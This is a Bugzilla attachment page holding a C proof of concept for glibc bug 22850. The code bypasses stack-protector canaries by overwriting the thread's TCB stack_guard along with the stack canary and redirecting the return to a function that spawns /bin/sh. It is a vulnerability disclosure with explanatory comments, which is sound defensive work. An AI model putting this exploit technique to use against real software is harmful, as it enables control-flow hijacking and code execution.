Sourceware Bugzilla – Attachment 10825 Details for
Bug 22850
Harden TCB against stack protector bypass via overwrite of stack_guard
Proof Of Concept
pthread_tcb_poc_exploit.c (text/x-csrc), 1.15 KB, created by
Ilya Smith
on 2018-02-16 12:09:04 UTC
Description:
Proof Of Concept
Filename:
MIME Type:
Creator:
Ilya Smith
Created:
2018-02-16 12:09:04 UTC
Size:
1.15 KB
patch
obsolete
// Proof of concept attached to sourceware bug 22850 ("Harden TCB against
// stack protector bypass via overwrite of stack_guard").
//
// What it demonstrates (x86-64, glibc/NPTL): the reference copy of the
// stack-protector canary that function epilogues compare against lives in
// the thread control block (TCB), reached through the %fs base obtained
// with arch_prctl(ARCH_GET_FS).  The thread below measures the distance
// from the canary slot in its own frame to the TCB and then performs one
// contiguous write that covers that whole range.  A program compiled with
// -fstack-protector still passes its epilogue check afterwards, because
// both copies of the canary end up holding the same bytes.
//
// Why this matters for defenders: the canary check only detects an
// overflow if the reference copy is out of the overflow's reach.  The
// hardening this bug asks for is to keep the TCB from being reachable by
// a linear overwrite starting on the thread stack; with that in place the
// copy below would fault before the reference canary is touched.
//
// NOTE(review): memset/memcpy and execve are used without <string.h> and
// <unistd.h>; the file relies on implicit declarations, which C99 and
// later compilers reject or warn about.
#include <pthread.h>
#include <stdlib.h>
#include <stdio.h>
#include <asm/prctl.h>
#include <sys/prctl.h>

// Marker function: if control reaches here after the overwrite, the
// stack-protector check did not fire.  Replaces the process image with a
// shell (envp passed as 0) purely so the result is visible at the prompt.
void pwn_payload() {
    char *argv[2] = {"/bin/sh", 0};
    execve(argv[0], argv, 0);
}

// Extra bytes added to the overwrite length; set to 0x30 from main when
// any command-line argument is given.  With fixup == 0 the copy in first()
// stops exactly at the TCB base and addr[5] is left untouched; with 0x30
// it extends 48 bytes into the TCB, which covers the canary word at
// addr[5] (byte offset 40).  Running the program once each way is the
// comparison the PoC is built around.
int fixup = 0;

// Thread body.  The overwrite has to happen on a pthread-created thread
// because its stack and its TCB come from the same allocation, which is
// what puts the TCB within reach of a contiguous write from a frame on
// that stack (layout assumption of this PoC — confirm against the glibc
// version under test).
//
// Returns 0 only if the overwrite is survived without reaching
// pwn_payload; everything past the final memcpy is undefined behaviour
// by construction.
void * first(void *x)
{
    // TCB base for this thread (%fs base).
    unsigned long *addr;
    arch_prctl(ARCH_GET_FS, &addr);
    printf("thread FS %p\n", addr);
    // addr[5] is the stack_guard slot of the TCB (offset 40 == 0x28).
    printf("cookie thread: 0x%lx\n", addr[5]);
    // frame[-1] is the slot just below the saved frame pointer; the PoC
    // treats it as this frame's canary slot (compiler- and flag-dependent,
    // hence the printed address for cross-checking in a debugger).
    unsigned long * frame = __builtin_frame_address(0);
    printf("stack_cookie addr %p \n", &frame[-1]);
    // NOTE(review): the operand is a pointer difference (ptrdiff_t); %lx
    // does not match that type, %tx would.
    printf("diff : %lx\n", (char*)addr - (char*)&frame[-1]);
    // Number of bytes from the canary slot up to the TCB base, plus fixup.
    unsigned long len =(unsigned long)( (char*)addr - (char*)&frame[-1]) + fixup;
    // example of exploitation
    // prepare exploit
    // Fill pattern 0x41 ('A') for the whole range, so that the stack
    // canary and (when fixup covers it) the TCB reference canary receive
    // identical bytes.
    void *exploit = malloc(len);
    memset(exploit, 0x41, len);
    // Address of pwn_payload placed 16 bytes past the canary slot —
    // presumably the frame's return-address slot on this ABI; confirm.
    void *ptr = &pwn_payload;
    memcpy((char*)exploit + 16, &ptr, 8);
    // exact stack-buffer overflow example
    // Simulates a stack-buffer overflow as a single write that starts at
    // the canary slot and runs through to the TCB.  In a real program this
    // would be a write past the end of a local array.
    memcpy(&frame[-1], exploit, len);
    return 0;
}

// Prints the main thread's %fs base and canary for comparison with the
// thread's values, enables the fixup when invoked with any argument, then
// runs the overwrite on a fresh thread and waits for it.
int main(int argc, char **argv, char **envp)
{
    pthread_t one;
    unsigned long *addr;
    void *val;
    arch_prctl(ARCH_GET_FS, &addr);
    // Any argument: extend the overwrite so it reaches addr[5] in the TCB.
    if (argc > 1)
    fixup = 0x30;
    printf("main FS %p\n", addr);
    // Same stack_guard slot as in first(); the value is shared by all
    // threads of the process, which is why overwriting it with the same
    // bytes as the stack copy defeats the check.
    printf("cookie main: 0x%lx\n", addr[5]);
    pthread_create(&one, NULL, &first, 0);
    pthread_join(one,&val);
    return 0;
}